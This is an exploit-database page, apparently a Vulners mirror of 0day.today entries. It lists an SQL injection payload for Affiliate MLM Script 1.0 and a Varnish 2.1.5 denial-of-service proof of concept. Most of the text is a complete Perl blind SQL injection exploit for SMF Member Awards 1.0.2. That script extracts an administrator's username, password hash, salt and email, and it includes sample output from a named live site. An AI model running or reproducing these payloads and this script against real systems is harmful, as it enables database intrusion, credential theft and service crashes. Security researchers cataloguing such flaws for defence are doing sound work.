Search...

Affiliate MLM Script 1.0 - product-category.php?key SQL Injection Vulnerability

2017-12-10T00:00:00

ID 1337DAY-ID-29156
Type zdt
Reporter Ihsan Sencan
Modified 2017-12-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # # # # # 
# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/
# Demo: http://www.smsemailmarketing.in/demo/Affiliate/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/product-category.php?key=[SQL]
# 
# Parameter: key (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: key=a%' AND 5436=5436 AND '%'='
# 
# # # # #

#  0day.today [2018-04-09]  #

JSON Vulners Source

Initial Source

{"sourceData": "# # # # # \r\n# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 08.12.2017\r\n# Vendor Homepage: https://www.phpscriptsmall.com/\r\n# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/\r\n# Demo: http://www.smsemailmarketing.in/demo/Affiliate/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/product-category.php?key=[SQL]\r\n# \r\n# Parameter: key (GET)\r\n# Type: boolean-based blind\r\n# Title: AND boolean-based blind - WHERE or HAVING clause\r\n# Payload: key=a%' AND 5436=5436 AND '%'='\r\n# \r\n# # # # #\n\n# 0day.today [2018-04-09] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/29156", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/29156", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "07408a1a22c6e0c3e9a14af4dcfd6d40"}, {"key": "modified", "hash": "f133700604598b586ea25a3208597d65"}, {"key": "published", "hash": "f133700604598b586ea25a3208597d65"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "415084c5d4b28312f5392baa0bc61b25"}, {"key": "sourceHref", "hash": "8edebca3e1214303ee6a8fb0b89521a7"}, {"key": "title", "hash": "f556da1c4966a529b441c59cae6c5ec8"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 2, "references": [], "lastseen": "2018-04-09T19:57:08", "published": "2017-12-10T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-29156", "hash": "3a2a2a107c8ebde247b26d8f6d7560cc26253abf7082799508d05baff4c0cbef", "modified": "2017-12-10T00:00:00", "title": "Affiliate MLM Script 1.0 - product-category.php?key SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2018-04-09T19:57:08"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12934", "SECURITYVULNS:DOC:29156"]}, {"type": "zdt", "idList": ["1337DAY-ID-5436"]}], "modified": "2018-04-09T19:57:08"}, "vulnersScore": -0.4}}

{"securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "Different DoS conditions on HTTP headers parsing.", "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "SECURITYVULNS:VULN:12934", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12934", "title": "Varnish multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "description": "\r\n\r\n###############################################\r\n# fetch_straight() | ((uintmax_t)cl == cll) #\r\n###############################################\r\n#\r\n# Authors:\r\n#\r\n# 22733db72ab3ed94b5f8a1ffcde850251fe6f466\r\n# c8e74ebd8392fda4788179f9a02bb49337638e7b\r\n# AKAT-1\r\n#\r\n#######################################\r\n\r\n# Versions: 2.1.5\r\n# Summary\r\nIt is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header.\r\n\r\n* Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true.\r\n\r\nPOC(response):\r\n -- cut --\r\nHTTP/1.1 200 OK\r\nContent-Type: text/xml; charset=utf-8\r\nContent-Length: 99999999999999999\r\n\r\n\r\n-- cut --\r\nEOF\r\n", "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "SECURITYVULNS:DOC:29156", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29156", "title": "Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-02-21T01:37:36", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-30T00:00:00", "published": "2009-06-30T00:00:00", "id": "1337DAY-ID-5436", "href": "https://0day.today/exploit/description/5436", "type": "zdt", "title": "SMF Mod Member Awards 1.0.2 Blind SQL Injection Exploit", "sourceData": "=======================================================\r\nSMF Mod Member Awards 1.0.2 Blind SQL Injection Exploit\r\n=======================================================\r\n\r\n\r\n-------------------------------------------------------------------------\r\n SMF Component Member Awards Blind SQL-injection Vulnerability\r\n-------------------------------------------------------------------------\r\n author: eLwaux\r\n-------------------------------------------------------------------------\r\n usage:\r\n expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params}\r\n params:\r\n -v = get version()\r\n -u = get user()\r\n -d = get database() \r\n -an = get User Name (\u00d0\u00bb\u00d0\u00be\u00d0\u00b3\u00d0\u00b8\u00d0\u00bd)\r\n -ap = get User Password (sha1 \u00d1\u2026\u00d0\u00b5\u00d1\u02c6)\r\n -as = get User Salt (\u00d1\u0081\u00d0\u00b0\u00d0\u00bb\u00d1\u0152\u00d1\u201a)\r\n -am = get User Mail (\u00d0\u00b5\u00d0\u00bc\u00d0\u00b5\u00d0\u00b9\u00d0\u00bb)\r\n-------------------------------------------------------------------------\r\n (\r\n also you can modif script source:\r\n $SHOW_ALL = 1; == show brute-step result\r\n $SHOW_COUNT_REQ = 1 == show req's count\r\n $OPTIMAL = 1 == optimal brute\r\n )\r\n-------------------------------------------------------------------------\r\nexample:\r\n http://scrubs.net.ru/cms/forum/index.php\r\n\r\n ] Host: scrubs.net.ru\r\n BAD answer = '\u00d0\u017e\u00d1\u02c6\u00d0\u00b8\u00d0\u00b1\u00d0\u00ba\u00d0\u00b0'\r\n ] version() = 5\r\n ] user() = [email\u00a0protected]\r\n ] database() = db\r\n ] id=1 NAME = zhbanito\r\n ] id=1 PASS = 4edd40635ac6fd263084d5ccc6fdc624fef3c932\r\n ] id=1 SALT = fe81\r\n ] id=1 MAIL = [email\u00a0protected]\r\n-------------------------------------------------------------------------\r\n exploit (perl):\r\n \r\n #! /usr/bin/perl -w\r\n\r\n use IO::Socket;\r\n use warnings;\r\n #use threads;\r\n #use threads::shared;\r\n\r\n $SHOW_ALL = 1;\r\n $SHOW_COUNT_REQ = 1;\r\n $OPTIMAL = 1;\r\n\r\n print \" SMF ] MemberAwards 1.0.2 exploit\\n\";\r\n print \" eLwaux(c)antichat 2009\\n\\n\";\r\n\r\n if (!$ARGV[0]) {\r\n print \" usage:\\n\".\r\n \" expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params}\\n\".\r\n \" params:\\n\".\r\n \" -v = get version()\\n\".\r\n \" -u = get user()\\n\".\r\n \" -d = get database()\\n\".\r\n \" -an = get User Name\\n\".\r\n \" -ap = get User Password\\n\".\r\n \" -as = get User Salt\\n\".\r\n \" -am = get User Mail\\n\";\r\n exit(0);\r\n }\r\n\r\n my $Uid = (!$ARGV[1])?'1':$ARGV[1];\r\n my $pref = (!$ARGV[2])?'smf_':$ARGV[2];\r\n $link .= $ARGV[0].'?action=profile;sa=awardsMembers;u='.$Uid.';id={SQL}';\r\n\r\n $getV = $getU = $getD = $getAN = $getAP = $getAS = $getAM = 0;\r\n for (my $i=0;$i<$#ARGV+1;$i++) {\r\n my $q = $ARGV[$i];\r\n $getV = 1 if ($q eq '-v');\r\n $getU = 1 if ($q eq '-u');\r\n $getD = 1 if ($q eq '-d');\r\n $getAN = 1 if ($q eq '-an');\r\n $getAP = 1 if ($q eq '-ap');\r\n $getAS = 1 if ($q eq '-as');\r\n $getAM = 1 if ($q eq '-am');\r\n }\r\n\r\n if ($link =~ /[http:\\/\\/]{0,}(.+?)\\/.+?{SQL}/) {\r\n $host = $1;\r\n }\r\n\r\n print ' ] Host: '.$host.\"\\n\";\r\n $BAD = &getBadAnswer();\r\n \r\n my $SFrom = 0;\r\n $SFrom = 41 if ($OPTIMAL == 1);\r\n my $SEnd = 0;\r\n $SEnd = 122 if ($OPTIMAL == 1);\r\n \r\n print \" BAD answer = '$BAD'\\n\\n\";\r\n print ' ] version() = '.&getVersion(3,5).\"\\n\" if ($getV==1);\r\n print ' ] user() = '.&getUser1($SFrom,$SEnd).\"\\n\" if ($getU==1); # a..z\r\n print ' ] database() = '.&getDatabase($SFrom,$SEnd).\"\\n\" if ($getD==1); # a..z\r\n print \"\\n\";\r\n\r\n print ' ] id='.$Uid.' NAME = '.&getAdminName($SFrom,$SEnd).\"\\n\" if ($getAN==1); # 0..9,a..z\r\n print ' ] id='.$Uid.' PASS = '.&getAdminPass($SFrom,$SEnd).\"\\n\" if ($getAP==1); # 0..9,a..z\r\n print ' ] id='.$Uid.' SALT = '.&getAdminSalt($SFrom,$SEnd).\"\\n\" if ($getAS==1); # a..z\r\n print ' ] id='.$Uid.' MAIL = '.&getAdminMail($SFrom,$SEnd).\"\\n\" if ($getAM==1); # a..z\r\n\r\n #print \"\\n\";\r\n print ' ] requests() = '.$SHOW_COUNT_REQ.\"\\n\"; # a..z\r\n\r\n exit(0);\r\n\r\n\r\n\r\n # get BAD answer\r\n sub getBadAnswer() {\r\n $BAD = \"An Error Has Occurred!\";\r\n if (&req('1+and+substring(version(),1,1)=-1##+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n $BAD = $1;\r\n }\r\n return $BAD;\r\n }\r\n\r\n # GET VERSION() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--=\r\n # ascii(lower(substring(version(),x,1) WHERE IN (1,...,Y)\r\n sub getVersion($$) {\r\n for($i=$_[0]; $i<=$_[1]; $i++) {\r\n $r = &req('1+and+substring(version(),1,1)='.$i.'##+',1000);\r\n if ($r =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n $SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0);\r\n return $i;\r\n }\r\n }\r\n }\r\n return '<'.$_[0].' and >'.$_[1];\r\n }\r\n\r\n # GET USER() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--=\r\n # ascii(lower(substring(user(),x,1) WHERE IN (1,...,Y)\r\n sub getUser1($$) {\r\n return &wherein($_[0],$_[1],'user()',0);\r\n }\r\n\r\n # GET DATABASE -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--=\r\n # ascii(lower(substring(database(),x,1) WHERE IN (1,...,Y)\r\n sub getDatabase($$) {\r\n return &wherein($_[0],$_[1],'database()',0);\r\n }\r\n\r\n # GET USER METHOD 2 -==--=--=-=-=-=-=-=\r\n # ascii(lower(substring(user(),1,1)))=Y\r\n sub getUser2($$) {\r\n $finish = 0; $s = 1;\r\n $user = '';\r\n while ($finish!=1) {\r\n $gs = 0;\r\n print \" user($s): \\n\" if ($SHOW_ALL==1);\r\n for($i=$_[0]; $i<=$_[1]; $i++) {\r\n if (&req('1+and+ascii(lower(substring(user(),'.$s.',1)))='.$i.'##+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n print \" (\".chr($i).\") $i,\\n\" if ($SHOW_ALL==1);\r\n if (index($1,$BAD)==-1) {\r\n $user .= chr($i);\r\n print \" found $s chars: $i = \".chr($i).\" ($user)\\n\" if ($SHOW_ALL==1);\r\n $s++; $gs = 1;\r\n last;\r\n }\r\n }\r\n }\r\n print \"\\n\" if ($SHOW_ALL==1);\r\n if ($gs == 0) {\r\n if ($user eq '') {return '<'.$_[0].' and >'.$_[1];}\r\n else {return $user;}\r\n }\r\n }\r\n \r\n }\r\n\r\n # GET ADMIN PASS_HASH -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--=\r\n #smf_members (ID_MEMBER,memberName,passwd,emailAddress,passwordSalt)\r\n # passwd = sha1(strtolower(username.password)\r\n # salt = substr(md5(mt_rand()), 0, 4)\r\n\r\n sub getAdminName($$) {\r\n return &wherein($_[0],$_[1],'memberName',1);\r\n }\r\n sub getAdminPass($$) {\r\n return &wherein($_[0],$_[1],'passwd',1);\r\n }\r\n sub getAdminSalt($$) {\r\n return &wherein($_[0],$_[1],'passwordSalt',1);\r\n }\r\n sub getAdminMail($$) {\r\n return &wherein($_[0],$_[1],'emailAddress',1);\r\n }\r\n\r\n\r\n # NEED FUNCTIONS -==--=--=-=-=-=-=-=-=-=-=-==-=--=\r\n\r\n sub req($$) {\r\n $SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0);\r\n $l = $link;\r\n $l =~ s/{SQL}/$_[0]/;\r\n $r = \"GET $l HTTP/1.1\\r\\nHost: $host\\r\\n\\r\\n\";\r\n my $sock = sock();\r\n print $sock $r;\r\n read($sock,my $a,$_[1]);\r\n return $a;\r\n }\r\n\r\n sub mlist($$) {\r\n $s = '';\r\n for(my $i=$_[0];$i<=$_[1];$i++) {$s.=$i.',';}\r\n return substr($s,0,length($s)-1);\r\n }\r\n\r\n\r\n sub wherein($$$$) { # ,,,, (1=user,2=else)\r\n print \" ] $_[2]\\n\" if ($SHOW_ALL==1);\r\n my $WHEREIN = 10; # WHERE IN (1,2,3,4,5,6,7,8,9,10)\r\n my $res = ''; my $c = 1;\r\n my $fmin = $_[0];\r\n my $fmax = $_[1];\r\n while ($c>=1) {\r\n my $gs = 0;\r\n for (my $i=0;$i<=int(($fmax-$fmin)/$WHEREIN);$i++){\r\n my $s1 = int($fmin+$i*$WHEREIN);\r\n my $s2 = int(($s1+$WHEREIN)>$fmax)?$fmax:($s1+$WHEREIN);\r\n my $ch = ($_[3]==1)?&getUBRUTE($s1,$s2,$c,$_[2]):&getBRUTE($s1,$s2,$c,$_[2]);\r\n if ($ch ne '?') {\r\n $res.=$ch; print \" $_[2]($c) = $ch [$res]\\n\" if ($SHOW_ALL==1);\r\n $c++; $gs = 1; last;\r\n }\r\n }\r\n if ($gs == 0) { $c=-1; return $res; last; }\r\n }\r\n }\r\n\r\n sub getBRUTE($$$$) { #start,end,pos,text\r\n print ' '.$_[0].'...'.$_[1].' ['.$_[2].\"]\\n\" if ($SHOW_ALL==1);\r\n if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n for(my $i=$_[0]; $i<=$_[1]; $i++) {\r\n if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))='.$i.'%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n return chr($i); last;\r\n }\r\n }\r\n }\r\n }\r\n }\r\n return '?';\r\n }\r\n\r\n sub getUBRUTE($$$$) { #start,end,pos,text\r\n print ' ['.$_[2].'] '.$_[0].'...'.$_[1].\"\\n\" if ($SHOW_ALL==1);\r\n if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n for(my $i=$_[0]; $i<=$_[1]; $i++) {\r\n if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')='.$i.'%23+',1000) =~ /<meta name=\"description\" content=\"(.+?)\" .>/) {\r\n if (index($1,$BAD)==-1) {\r\n return chr($i); last;\r\n }\r\n }\r\n }\r\n }\r\n }\r\n return '?';\r\n }\r\n\r\n sub sock {\r\n my $sock;\r\n do {\r\n $sock = new IO::Socket::INET \r\n (\r\n PeerAddr => $host,\r\n PeerPort => 80, \r\n PeerProto => 'tcp', \r\n TimeOut => 10\r\n ) or print \" ] connection error!\\n\";\r\n } while (!$sock);\r\n return $sock;\r\n }\r\n-------------------------------------------------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5436"}]}